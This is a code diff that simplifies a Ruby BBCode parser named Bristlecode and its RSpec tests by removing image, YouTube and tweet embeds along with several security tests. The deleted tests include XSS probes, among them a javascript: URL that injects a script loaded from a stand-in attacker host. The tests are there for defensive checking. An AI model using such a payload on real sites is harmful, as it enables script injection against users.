2 changed files with 29 additions and 337 deletions
--- a/bristlecode.rb
+++ b/bristlecode.rb
@ -1,92 +1,30 @@
 require 'parslet'
 require 'sanitize'
-require 'uri'

 module Bristlecode

-  class YoutubeFilter
-    def call(env)
-      node = env[:node]
-      node_name = env[:node_name]
-      return if env[:is_whitelisted] || !node.element?
-      return unless node_name == 'iframe'
-      return unless node['src'] =~ %r|\A(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/|
-      Sanitize.node!(node, {
-        :elements => %w[iframe],
-        :attributes => {'iframe'  => %w[allowfullscreen frameborder height src width]}
-      })
-      {:node_whitelist => [node]}
-    end
-  end
-
-  class TweetFilter
-    def call(env)
-      node = env[:node]
-      node_name = env[:node_name]
-      return if env[:is_whitelisted] || !node.element?
-      case node_name
-      when 'script'
-        return script env
-      when 'blockquote'
-        return blockquote env
-      else
-        return
-      end
-    end
-
-    def script(env)
-      node = env[:node]
-      return unless node['src'] == "//platform.twitter.com/widgets.js"
-      Sanitize.node!(node, {
-        :elements => %w[script],
-        :attributes => {'script'  => %w[aync src charset]}
-      })
-      {:node_whitelist => [node]}
-    end
-
-    def blockquote(env)
-      node = env[:node]
-      Sanitize.node!(node, {
-        :elements => %w[blockquote a],
-        :attributes => {'blockquote'  => ['class'], 'a' => ['href']}
-      })
-      {:node_whitelist => [node]}
-    end
-  end
-
  Config = Sanitize::Config::freeze_config(
-    :elements => %w[b em i strong u a strike br img],
+    :elements => %w[b em i strong u a strike br],
    :attributes => {
-      'a' => ['href'],
-      'img' => ['src'],
+      'a' => ['href']
    },
    :add_attributes => {
      'a' => {'rel' => 'nofollow'}
    },
    :protocols => {
      'a' => {'href' => ['http', 'https', :relative]}
-    },
-    :transformers => [YoutubeFilter.new, TweetFilter.new],
-    :remove_contents => ['script']
+    }
  )

  def Bristlecode.to_html(text)
-    begin
-      parser = Bristlecode::Parser.new
-      parse_tree = parser.parse(text)
-      tree = Bristlecode::Transform.new.apply(parse_tree)
-      html = tree.to_html
-    rescue Parslet::ParseFailed => parse_error
-      html = text
-    end
-    Bristlecode.sanitize_html(html)
-  end
-
-  def Bristlecode.sanitize_html(html)
+    parser = Bristlecode::Parser.new
+    parse_tree = parser.parse(text)
+    tree = Bristlecode::Transform.new.apply(parse_tree)
+    html = tree.to_html
    Sanitize.fragment(html, Bristlecode::Config)
  end

-  def Bristlecode.clean!(text)
+  def Bristlecode.clean(text)
    text.gsub!('&', '&amp;')
    text.gsub!('<', '&lt;')
    text.gsub!('>', '&gt;')
@ -96,6 +34,9 @@ module Bristlecode
  end

  class Parser < Parslet::Parser
+    rule(:space) { match('\s').repeat(1) }
+    rule(:space?) { space.maybe }
+
    rule(:bold_open) { str('[b]') | str('[B]') }
    rule(:bold_close) { str('[/b]') | str('[/B]') | eof }
    rule(:bold) { bold_open >> children.as(:bold) >> bold_close }
@ -111,7 +52,7 @@ module Bristlecode
    rule(:simple_href) { (url_close.absent? >> any).repeat }
    rule(:simple_url) { url_open >> simple_href.as(:href) >> url_close }
    rule(:url_title_open) { str('[url=') }
-    rule(:url_title_href) { (match(']').absent? >> any).repeat(1) }
+    rule(:url_title_href) { (match(']').absent? >> any).repeat }
    rule(:url_with_title) {
      url_title_open >>
      url_title_href.as(:href) >>
@ -121,33 +62,16 @@ module Bristlecode
    }
    rule(:url) { (simple_url | url_with_title).as(:url) }

-    rule(:youtube_open) { str('[youtube]') }
-    rule(:youtube_close) { str('[/youtube]') }
-    rule(:youtube_url) { (youtube_close.absent? >> any).repeat(1) }
-    rule(:youtube) { (youtube_open >> youtube_url.as(:src) >> youtube_close).as(:youtube) }
-
-    rule(:tweet_open) { str('[tweet]') }
-    rule(:tweet_close) { str('[/tweet]') }
-    rule(:tweet_url) { (tweet_close.absent? >> any).repeat(1) }
-    rule(:tweet) { (tweet_open >> tweet_url.as(:src) >> tweet_close).as(:tweet) }
-
-    rule(:img_open) { str('[img]') }
-    rule(:img_close) { str('[/img]') }
-    rule(:img_src) { (img_close.absent? >> any).repeat(1) }
-    rule(:img) { (img_open >> img_src.as(:src) >> img_close).as(:img) }
-
    rule(:eof) { any.absent? }
-    rule(:tag) { bold | italic | url | linebreak | img | youtube | tweet }
+    rule(:tag) { bold | italic | url | linebreak }
    rule(:elem) { text.as(:text) | tag }
-    rule(:tag_open) { bold_open | italic_open | url_open | url_title_open | img_open |
-      youtube_open | tweet_open }
-    rule(:tag_close) { bold_close | italic_close | url_close | img_close | youtube_close |
-      tweet_close }
+    rule(:tag_open) { bold_open | italic_open | url_open | url_title_open }
+    rule(:tag_close) { bold_close | italic_close | url_close }
    rule(:tag_delim) { tag_open | tag_close | linebreak }

    rule(:text) { (tag_delim.absent? >> any).repeat(1) }
-    rule(:children) { elem.repeat }
-    rule(:doc) { elem.repeat.as(:doc) }
+    rule(:children) { space? >> elem.repeat }
+    rule(:doc) { space? >> elem.repeat.as(:doc) }
    root(:doc)
  end

@ -158,9 +82,6 @@ module Bristlecode
    rule(doc: subtree(:doc)) { Doc.new(doc) }
    rule(url: subtree(:url)) { Url.new(url) }
    rule(br: simple(:br)) { Linebreak.new }
-    rule(img: subtree(:img)) { Img.new(img) }
-    rule(youtube: subtree(:youtube)) { Youtube.new(youtube) }
-    rule(tweet: subtree(:tweet)) { Tweet.new(tweet) }
  end

  class Doc
@ -175,29 +96,19 @@ module Bristlecode
      children.each{|child| s << child.to_html }
      s.string
    end
-
-    def to_text
-      s = StringIO.new
-      children.each{|child| s << child.to_text }
-      s.string
-    end
  end

  class Text
    attr_accessor :text

    def initialize(text)
-      self.text = text.to_str
-      Bristlecode.clean!(self.text)
+      self.text = text.to_str.strip
+      Bristlecode.clean(self.text)
    end

    def to_html
      text
    end
-
-    def to_text
-      text
-    end
  end

  class Bold
@ -210,10 +121,6 @@ module Bristlecode
    def to_html
      "<b>#{children.to_html}</b>"
    end
-
-    def to_text
-      "[b]#{children.to_text}[/b]"
-    end
  end

  class Italic
@ -226,145 +133,35 @@ module Bristlecode
    def to_html
      "<i>#{children.to_html}</i>"
    end
-
-    def to_text
-      "[i]#{children.to_text}[/i]"
-    end
  end

  class Url
-    attr_accessor :href, :title, :bad_href, :title_supplied
+    attr_accessor :href, :title

    def initialize(args)
      self.href = args[:href].to_str.strip
+      check_href
      if args.has_key? :title
-        self.title_supplied = true
        self.title = Doc.new(args[:title])
      else
-        self.title_supplied = false
-        self.title = Text.new(args[:href].to_str.strip)
+        self.title = Text.new(href)
      end
    end

-    def href_ok?
-      href =~ /^(\/|https?:\/\/)/
+    def check_href
+      unless href =~ /^(\/[^\/]|https?:\/\/)/
+        raise "href must start with /, http, or https"
+      end
    end

    def to_html
-      return to_text unless href_ok?
      "<a href=\"#{href}\">#{title.to_html}</a>"
    end
-
-    def to_text
-      if title_supplied
-        "[url=#{href}]#{title.to_text}[/url]"
-      else
-        text = "[url]#{href}[/url]"
-        Bristlecode.clean!(text)
-        text
-      end
-    end
  end

  class Linebreak
    def to_html
      "<br>"
    end
-
-    def to_text
-      "[br]"
-    end
-  end
-
-  class Img
-    attr_accessor :src
-
-    def initialize(img)
-      self.src = img[:src].to_str
-    end
-
-    def src_ok?
-      src =~ /^(\/|https?:\/\/)/
-    end
-
-    def to_html
-      return to_text unless src_ok?
-      "<img src=\"#{src}\">"
-    end
-
-    def to_text
-        text = "[img]#{src}[/img]"
-        Bristlecode.clean!(text)
-        text
-    end
-  end
-
-  class Youtube
-    attr_accessor :raw_url, :video_id
-
-    def initialize(args)
-      self.raw_url = args[:src].to_str.strip
-      self.video_id = parse_url
-    end
-
-    def parse_url
-      begin
-        uri = URI::parse(raw_url)
-        return false unless ['http', 'https'].include? uri.scheme
-        return false unless ['www.youtube.com', 'youtube.com', 'youtu.be'].include? uri.host
-        if uri.host == 'youtu.be'
-          return uri.path[1..-1]
-        else
-          URI::decode_www_form(uri.query).each{|key, value| return value if key == 'v'}
-        end
-      rescue URI::InvalidURIError
-      end
-
-      return false
-    end
-
-    def to_html
-      return to_text unless video_id
-      "<iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/#{video_id}\" frameborder=\"0\" allowfullscreen></iframe>"
-    end
-
-    def to_text
-      text = "[youtube]#{raw_url}[/youtube]"
-      Bristlecode.clean!(text)
-      text
-    end
-  end
-
-  class Tweet
-    attr_accessor :raw_url, :tweet_url
-
-    def initialize(tweet)
-      self.raw_url = tweet[:src].to_str.strip
-      self.tweet_url = parse_url(self.raw_url)
-    end
-
-    def parse_url(url_in)
-      begin
-        uri = URI::parse(url_in)
-        return false unless ['http', 'https'].include? uri.scheme
-        return false unless uri.host == 'twitter.com'
-        return false unless uri.path =~ /^\/[^\/]+\/status\/\d+/
-        # strip querystring and fragment
-        return "#{uri.scheme}://#{uri.host}#{uri.path}"
-      rescue URI::InvalidURIError
-      end
-      return false
-    end
-
-    def to_html
-      return to_text unless tweet_url
-      "<blockquote class=\"twitter-tweet\"><a href=\"#{tweet_url}\"></a></blockquote><script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>"
-    end
-
-    def to_text
-      text = "[tweet]#{raw_url}[/tweet]"
-      Bristlecode.clean!(text)
-      text
-    end
  end
 end
--- a/spec/bristlecode/parser_spec.rb
+++ b/spec/bristlecode/parser_spec.rb
@ -9,17 +9,12 @@ module Bristlecode
      Bristlecode.to_html(text)
    end

-    def sanitize_html(text)
-      Bristlecode.sanitize_html(text)
-    end
-
    it 'leaves an empty string unchanged' do
      expect(to_html("")).to eq("")
    end

    it 'handles empty documents' do
-      text = "      \t   \n    \n     \t"
-      expect(to_html(text)).to eq(text)
+      expect(to_html("      \t   \n    \n     \t")).to eq("")
    end

    it 'handles special chars' do
@ -28,17 +23,6 @@ module Bristlecode
      expect(to_html('<')).to eq('&lt;')
    end

-    it 'escapes tags' do
-      input = '<script>alert(1)</script>'
-      output = '&lt;script&gt;alert(1)&lt;/script&gt;'
-      expect(to_html(input)).to eq(output)
-    end
-
-    it 'entirely removes unapproved script tags in sanitization' do
-      input = '<script>alert(1)</script>'
-      expect(sanitize_html(input)).to eq('')
-    end
-
    it 'handles plain text just fine' do
      expect(to_html("plaintext")).to eq("plaintext")
    end
@ -53,12 +37,12 @@ module Bristlecode

    it 'can nest tags' do
      doc = '[b] bold [i] italic [/i] bold [/b]'
-      expected = '<b> bold <i> italic </i> bold </b>'
+      expected = '<b>bold<i>italic</i>bold</b>'
      out = to_html(doc)
      expect(out).to eq(expected)

      doc = '[i] italic [b] bold [/b] italic [/i]'
-      expected = '<i> italic <b> bold </b> italic </i>'
+      expected = '<i>italic<b>bold</b>italic</i>'
      out = to_html(doc)
      expect(out).to eq(expected)
    end
@ -72,9 +56,7 @@ module Bristlecode
      input = '[url]http://example.com[/url]'
      output = '<a href="http://example.com" rel="nofollow">http://example.com</a>'
      expect(to_html(input)).to eq(output)
-    end

-    it 'trims whitespace around urls' do
      input = '[url]    http://example.com    [/url]'
      output = '<a href="http://example.com" rel="nofollow">http://example.com</a>'
      expect(to_html(input)).to eq(output)
@ -92,89 +74,9 @@ module Bristlecode
      expect(to_html(input)).to eq(output)
    end

-    it 'ignores url tags with bad protocols' do
-      input = '[url=javascript:alert(1)]google.com[/url]'
-      expect(to_html(input)).to eq(input)
-
-      input = '[url=ftp://something.com/filez]google.com[/url]'
-      expect(to_html(input)).to eq(input)
-    end
-
-    it 'allows subtrees in <a> tags' do
-      input = '[url=http://google.com]this is [b]the[/b] google[/url]'
-      output = '<a href="http://google.com" rel="nofollow">this is <b>the</b> google</a>'
-      expect(to_html(input)).to eq(output)
-    end
-
-    it 'rejects bad url protocols' do
-      input = "[url=javascript:t=document.createElement('script');t.src='//hacker.domain/script.js';document.body.appendChild(t);//]test[/url]"
-      expect(to_html(input)).to eq(input)
-
-      input = "[url=ftp://whatever.com/etc]warez[/url]"
-      expect(to_html(input)).to eq(input)
-    end
-
    it 'renders a linebreak' do
      expect(to_html('[br]')).to eq('<br>')
    end
-
-    it 'renders an image' do
-      input = '[img]http://example.com/cat.gif[/img]'
-      expect(to_html(input)).to eq('<img src="http://example.com/cat.gif">')
-    end
-
-    it 'ignores bad image src protocols' do
-      input = '[img]javascript:alert(1)[/img]'
-      expect(to_html(input)).to eq(input)
-
-      input = '[img]ftp://example.com/cat.gif[/img]'
-      expect(to_html(input)).to eq(input)
-    end
-
-    it 'returns the original text on parse failure' do
-      input = '[img]http://example.com/dog.gif[img]http://example.com/cat.gif[/img][/img]'
-      expect(to_html(input)).to eq(input)
-
-      input = '[url][url]x[/url][/url]'
-      expect(to_html(input)).to eq(input)
-    end
-
-    it 'can render a youtube video with a watch link' do
-      input = '[youtube]https://youtube.com/watch?v=uxpDa-c-4Mc[/youtube]'
-      output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
-      expect(to_html(input)).to eq(output)
-
-      input = '[youtube]https://www.youtube.com/watch?v=uxpDa-c-4Mc[/youtube]'
-      output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
-      expect(to_html(input)).to eq(output)
-    end
-
-    it 'can render a youtube video with a share link' do
-      input = '[youtube]https://youtu.be/uxpDa-c-4Mc[/youtube]'
-      output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
-      expect(to_html(input)).to eq(output)
-    end
-
-    it 'refuses bad youtube urls' do
-      input = '[youtube]http://example.com/cats.gif[/youtube]'
-      expect(to_html(input)).to eq(input)
-    end
-
-    it "requires full url for youtube vids" do
-      input = '[youtube]dQw4w9WgXcQ[/youtube]'
-      expect(to_html(input)).to eq(input)
-    end
-
-    it 'can render a tweet' do
-      input = '[tweet]https://twitter.com/jordanorelli/status/662654098156748800[/tweet]'
-      output = '<blockquote class="twitter-tweet"><a href="https://twitter.com/jordanorelli/status/662654098156748800" rel="nofollow"></a></blockquote><script src="//platform.twitter.com/widgets.js" charset="utf-8"></script>'
-      expect(to_html(input)).to eq(output)
-    end
-
-    it 'requres the full url for a tweet' do
-      input = '[tweet]662654098156748800[/tweet]'
-      expect(to_html(input)).to eq(input)
-    end
  end

  describe Parser do
@ -288,12 +190,5 @@ module Bristlecode
        expect(parser.linebreak).to parse('[br]')
      end
    end
-
-    describe '#img' do
-      it 'accepts valid image urls' do
-        expect(parser.img).to parse('[img]http://example.com/something.gif[/img]')
-        expect(parser.img).to parse('[img]https://example.com/something.gif[/img]')
-      end
-    end
  end
 end